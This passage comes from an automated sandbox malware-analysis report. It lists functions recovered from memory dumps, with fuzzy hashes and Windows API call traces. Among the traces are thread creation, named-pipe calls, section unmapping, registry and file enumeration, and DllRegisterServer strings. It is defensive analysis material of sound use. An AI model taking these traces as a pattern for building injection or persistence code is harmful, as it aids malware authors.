  • GetLastError.KERNEL32(00000000), ref: 001C2039
  • InterlockedDecrement.KERNEL32(001EAF5C), ref: 001C2067
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C2098
    • Part of subcall function 001C771B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
    • Part of subcall function 001C771B: lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
    • Part of subcall function 001C771B: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
    • Part of subcall function 001C771B: mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
    • Part of subcall function 001C771B: CloseHandle.KERNEL32(?), ref: 001C77C0
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • DeleteFileA.KERNEL32(00000000), ref: 001C2088
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B32B25, Relevance: 10.6, APIs: 7, Instructions: 98 Total matches: 51file
Similarity
  • Total matches: 51
  • API ID: GetLastError$CloseHandleFlushFileBuffersSetEndOfFile
  • String ID:
  • API String ID: 587453859-0
  • Opcode ID: 284135ccc4a6042596739f0da6f5d139cb388ced26bcc24a24efab720d4ab4ef
  • Instruction ID: faed8b72c47cb1bc77f0cf104ccb7fc234e9d1564366b5239b25521f33b16b83
  • Opcode Fuzzy Hash: 8DF0E254229DC9CED11B608A12B3793A251EF33640D7C1797B422ADA068B61713F978A
  • Instruction Fuzzy Hash: faed8b72c47cb1bc77f0cf104ccb7fc234e9d1564366b5239b25521f33b16b83
APIs
  • GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BA6
  • SetEndOfFile.KERNEL32(01B34303,?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BB2
  • CloseHandle.KERNEL32(01B34303), ref: 01B32BBB
  • GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BC3
  • GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BFE
  • FlushFileBuffers.KERNEL32(00000000), ref: 01B32C08
  • GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32C10
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001C70F5, Relevance: 10.6, APIs: 7, Instructions: 91 Total matches: 60memorystringsynchronization
Similarity
  • Total matches: 60
  • API ID: lstrlen$GetDriveTypeHeapFreeRtlAllocateHeapWaitForSingleObjectmemset
  • String ID:
  • API String ID: 3218151923-0
  • Opcode ID: 974418b0150871375a409eae20db66cf184f8890a346e9cc83530061c0aa9893
  • Instruction ID: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
  • Opcode Fuzzy Hash: 97F02461CA2887A7900B446974553AEDA116F416C9D4C0B62ED412814EAF0732E6EB4A
  • Instruction Fuzzy Hash: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C713F
  • memset.NTDLL ref: 001C715C
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C7178
  • GetDriveTypeW.KERNEL32(?), ref: 001C7186
  • lstrlenW.KERNEL32(?), ref: 001C7192
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • lstrlenW.KERNEL32(?), ref: 001C71BF
  • HeapFree.KERNEL32(00000000,?), ref: 001C71D8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D6DF6, Relevance: 10.6, APIs: 7, Instructions: 90 Total matches: 57filesynchronization
Similarity
  • Total matches: 57
  • API ID: GetLastError$CloseHandleSetEndOfFileSetFilePointerWaitForSingleObjectWriteFile
  • String ID:
  • API String ID: 1310882240-0
  • Opcode ID: 428b72d32063ac54d5b905598191ac261dcad3cf285b84f146690d990cf327a1
  • Instruction ID: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
  • Opcode Fuzzy Hash: CAF02BA0515DC14BC217346516727BFD904EB425C5E4C7372A840420494F06769BAB5A
  • Instruction Fuzzy Hash: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
APIs
  • GetLastError.KERNEL32 ref: 001D6E41
  • WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
  • SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
  • WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
  • SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
  • GetLastError.KERNEL32 ref: 001D6EDD
  • CloseHandle.KERNEL32(00000006), ref: 001D6EE9
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CBD48, Relevance: 10.6, APIs: 7, Instructions: 89 Total matches: 58memorystringpipe
Similarity
  • Total matches: 58
  • API ID: memcpy$CallNamedPipeGetLastErrorHeapFreeRtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 1038157847-0
  • Opcode ID: 6bb6ae630451ca86ee9df0719d803bcc4810f9cd3f6b8a390704e6ae44b564aa
  • Instruction ID: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
  • Opcode Fuzzy Hash: 73F05990085A81D2C123B42951217FFF194BEC02DBCDEA772E8E21885E2E0162A06B5D
  • Instruction Fuzzy Hash: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
APIs
  • lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
  • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
  • memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
  • memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
  • CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
  • GetLastError.KERNEL32 ref: 001CBE07
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C79A7, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 87 Total matches: 56memoryfilestring
Similarity
  • Total matches: 56
  • API ID: HeapFree$DeleteFileStrTrimlstrlen
  • String ID: ss: *.*.*.*
  • API String ID: 1870149019-856079725
  • Opcode ID: 59ebdf1013b10810b54038a6e3da88a7dec1c4f015ef1646412946d67e45a806
  • Instruction ID: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
  • Opcode Fuzzy Hash: ECF09E21084D41AF8937286A50607F50915FB804F1C4DCFB7AC857B2857F836228BB4B
  • Instruction Fuzzy Hash: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • lstrlen.KERNEL32(00000000,?,00000F00), ref: 001C79CB
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • StrTrimA.SHLWAPI(00000000,001E53D4), ref: 001C7A55
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7A72
  • DeleteFileA.KERNEL32(00000000,00000000,?,?,001ECE60,00000000,?,00000F00), ref: 001C7A7A
  • HeapFree.KERNEL32(00000000,00000000,001ECE60), ref: 001C7A89
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7D61, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 75 Total matches: 58memory
Similarity
  • Total matches: 58
  • API ID: memcpy$RtlAllocateHeap
  • String ID: [URL]$https://
  • API String ID: 3738462082-2839221783
  • Opcode ID: afc151603a67bdcf01d5cf8a846d0f5f8a912d4aa94ead1b687b7b5f553c7413
  • Instruction ID: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
  • Opcode Fuzzy Hash: 21E02B245D1F02D6D85A20845438BB7C6873D42394CAE7766C950255772A25B174B588
  • Instruction Fuzzy Hash: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
APIs
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
  • memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
  • memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
  • memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C771B, Relevance: 10.6, APIs: 7, Instructions: 71 Total matches: 62memoryfilestring
Similarity
  • Total matches: 62
  • API ID: HeapFree$CloseHandleCreateFileRtlAllocateHeaplstrlenmbstowcs
  • String ID:
  • API String ID: 1841334458-0
  • Opcode ID: 88abf7bf9e6c094b0eee3fb77fa4d18763972b4349be3218ed9dbfc152fe13ca
  • Instruction ID: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
  • Opcode Fuzzy Hash: 2BE02B71181D5096C02719A68C58339E6056F422E4E5D4627FA013910FB24317E8EBAB
  • Instruction Fuzzy Hash: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C7527: LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 001C75DB
    • Part of subcall function 001C7527: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 001C75FC
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
  • lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
  • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
  • mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C7B90: GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
    • Part of subcall function 001C7B90: memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
    • Part of subcall function 001C7B90: RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
    • Part of subcall function 001C7B90: lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7B90: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
  • CloseHandle.KERNEL32(?), ref: 001C77C0
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2416, Relevance: 10.6, APIs: 7, Instructions: 62 Total matches: 50memorystringthread
Similarity
  • Total matches: 50
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFreeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 1766977795-0
  • Opcode ID: b41ce86395a358d9a6be2e887350fb16e7ee7d04885f28ea6336c7c9663497fb
  • Instruction ID: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
  • Opcode Fuzzy Hash: A8E026A5068C0583807778228061BAF9B82BAC10D8C8D7123FE402614B2F037487DF2B
  • Instruction Fuzzy Hash: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
APIs
  • lstrlen.KERNEL32(?,00000000,00000000,00000001,?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C242D
  • RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 001C2440
  • lstrcpy.KERNEL32(00000008,?), ref: 001C2462
  • CreateThread.KERNEL32(00000000,00000000,001C23CD,00000000,00000000,00000000), ref: 001C247A
  • CloseHandle.KERNEL32(00000000), ref: 001C2485
  • GetLastError.KERNEL32(?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000,001EC202,00000000,00000000,00000000), ref: 001C248D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C249E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C4EEE, Relevance: 9.2, APIs: 6, Instructions: 187 Total matches: 61memorystringthread
Similarity
  • Total matches: 61
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeaplstrcmplstrlenwsprintf
  • String ID:
  • API String ID: 236900386-0
  • Opcode ID: 0432ee343612a59173c04e27a8b524be30c23a17c6314db2962a76565d5ddb3c
  • Instruction ID: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
  • Opcode Fuzzy Hash: F7119B31058EC2A7441760C18092BBED450FC920E580D37F2EEB86A2CE6F43258B2B1B
  • Instruction Fuzzy Hash: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
APIs
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C46AF
    • Part of subcall function 001C45F0: WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C473C
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
    • Part of subcall function 001C45F0: RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
    • Part of subcall function 001D829C: lstrlen.KERNEL32(?,00000000,001EABBC,?,001C194F,?), ref: 001D82A6
    • Part of subcall function 001D829C: StrRChrA.SHLWAPI(?,00000000,0000002E), ref: 001D82D1
    • Part of subcall function 001D829C: lstrcat.KERNEL32(00000000,?), ref: 001D8317
  • lstrcmp.KERNEL32(?,?), ref: 001C4F65
  • GetCurrentThreadId.KERNEL32(?,?,00000000,?,Function_00003E59,?,00000001), ref: 001C5037
  • GetCurrentThread.KERNEL32 ref: 001C5048
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001C1916: RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C192A
    • Part of subcall function 001C1916: RegCloseKey.ADVAPI32(?), ref: 001C1958
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C50A6
  • wsprintfA.USER32 ref: 001C50B7
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C50C2
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C8CA3, Relevance: 9.1, APIs: 6, Instructions: 72 Total matches: 58memorystring
Similarity
  • Total matches: 58
  • API ID: HeapFreelstrlen$mbstowcswcstombs
  • String ID:
  • API String ID: 2099024402-0
  • Opcode ID: e75e910ff2ec0d94baf6de8394c43fdc3fb5dca6cdb9e0b5bf2cf534734101ee
  • Instruction ID: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
  • Opcode Fuzzy Hash: 88E02BB20C04C297060710B3847577DDA09BCC21D100E53ABDB08EC34DA68723A5BB6F
  • Instruction Fuzzy Hash: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
APIs
  • lstrlenW.KERNEL32(?), ref: 001C8CC7
  • wcstombs.NTDLL ref: 001C8CE7
    • Part of subcall function 001C8B4E: RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,?,?), ref: 001C8C27
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
  • lstrlen.KERNEL32(00000000), ref: 001C8D0B
  • mbstowcs.NTDLL ref: 001C8D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D3F
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D59
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B34B0D, Relevance: 9.0, APIs: 6, Instructions: 40 Total matches: 320file
Similarity
  • Total matches: 320
  • API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
  • String ID:
  • API String ID: 3756146440-0
  • Opcode ID: 4915370d64bf5c115dcc7df05119504ed8106c73e5c20004021290fc9b098e04
  • Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
  • Opcode Fuzzy Hash: A8D0126D078B4ED4D91985A715E2F03E1915F33700E3C460872607926A8B3673AEDF49
  • Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
APIs
  • CreateFileW.KERNEL32(01B37494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 01B34B26
  • GetLastError.KERNEL32(?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B33
  • WriteFile.KERNEL32(00000000,?,00001000,01B37494,00000000), ref: 01B34B49
  • SetEndOfFile.KERNEL32(00000000,?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B54
  • GetLastError.KERNEL32(?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B5C
  • CloseHandle.KERNEL32(00000000), ref: 01B34B65
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001DD36B, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 207 Total matches: 57sleepsynchronization
Similarity
  • Total matches: 57
  • API ID: SetLastErrorSleepWaitForSingleObjectmemset
  • String ID: vids
  • API String ID: 1012678829-3767230166
  • Opcode ID: a88323ab6a07f6567de602f156fbacf356d172862014bdadb632bb7e4ac17ede
  • Instruction ID: 7794b0509761be8d864e16b56acb391e5ba30bd334e757b795fdcad4b1508c3e
  • Opcode Fuzzy Hash: E1216B4906CCE1E3D8E268440463F6D32146F83DFAD4DA72667BE9A6D75F012306D629
  • Instruction Fuzzy Hash: 7794b0509761be8d864e16b56acb391e5ba30bd334e757b795fdcad4b1508c3e
APIs
  • memset.NTDLL ref: 001DD3C6
  • SetLastError.KERNEL32(00000000,?,?,?), ref: 001DD41A
    • Part of subcall function 001DD348: GetSystemTimeAsFileTime.KERNEL32(00000001,?,?,?,001DD513,?,00000000,00000000,?,?,?,?,00000000,?,?,?), ref: 001DD351
    • Part of subcall function 001DD348: _aulldiv.NTDLL(00000001,?,00002710,00000000), ref: 001DD364
  • WaitForSingleObject.KERNEL32(?,?), ref: 001DD599
  • Sleep.KERNEL32(?,?,?,00000001,?,?,00000000,0000000C,0000000F,?,00000000,00000000,?,?,?,?), ref: 001DD5AA
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C838C, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 102 Total matches: 54memory
Similarity
  • Total matches: 54
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: https://
  • API String ID: 3817218409-4275131719
  • Opcode ID: f288712f8a6e8bd0bf07739e93ef791456e10643a80339435031cd9f7b6ed460
  • Instruction ID: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
  • Opcode Fuzzy Hash: 18F08B601A85C2A6802718C294AC7B2C604BE80AC0D8D536FFF503929E5FA770D5BB0A
  • Instruction Fuzzy Hash: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
APIs
    • Part of subcall function 001C5ADD: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C5AEB
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C83ED
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C843C
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8471
  • HeapFree.KERNEL32(00000000,?), ref: 001C8481
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C4202, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63 Total matches: 53memoryregistry
Similarity
  • Total matches: 53
  • API ID: HeapFreeRegCloseKeyRegOpenKeyRtlAllocateHeap
  • String ID: Main
  • API String ID: 1238789381-521822810
  • Opcode ID: 430bf3c3e099aaf98ba0d13378e5d8da2de179d3274a2f5d09db6df723472999
  • Instruction ID: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
  • Opcode Fuzzy Hash: CAE026B00A45C5AA403B7C81647B2F29410F9A08C20CD976BEE009F28CAE4670A27B9A
  • Instruction Fuzzy Hash: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
APIs
  • RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C4220
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C4256
  • HeapFree.KERNEL32(00000000,?), ref: 001C428F
  • RegCloseKey.ADVAPI32(?), ref: 001C4298
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C29BF, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41 Total matches: 45memorystring
Similarity
  • Total matches: 45
  • API ID: CreateDirectoryHeapFreeRtlAllocateHeaplstrlen
  • String ID: %APPDATA%\Microsoft\
  • API String ID: 3959905781-2699254172
  • Opcode ID: a91e168cb75582dc69dc678417b6008db4073c04297a41e19573c560bdc487dc
  • Instruction ID: cffe0b6492667c1a66e0568daab83b9343bd146d6441e28ba88ab90f7e1d944e
  • Opcode Fuzzy Hash: 10D05EB0444802AB953BA426806A739884A7F823D0C5E7536E9404A26FBB9362956E6A
  • Instruction Fuzzy Hash: cffe0b6492667c1a66e0568daab83b9343bd146d6441e28ba88ab90f7e1d944e
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
  • lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D9EAA, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 33 Total matches: 56memorystring
Similarity
  • Total matches: 56
  • API ID: lstrlen$RtlAllocateHeap
  • String ID: [FILE]$DllRegisterServer
  • API String ID: 2544908171-3029713317
  • Opcode ID: 2d4b95e8c34fd7eb35c32aaba08f5fcf9921a6e8c8be63207aa385bfa2f516c2
  • Instruction ID: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
  • Opcode Fuzzy Hash: 73C012709914038B04177926842423CC68A39957E540E0619E8473611A5B0302CD5A1E
  • Instruction Fuzzy Hash: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
APIs
  • lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
  • lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
  • RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
Strings
Memory Dump Source
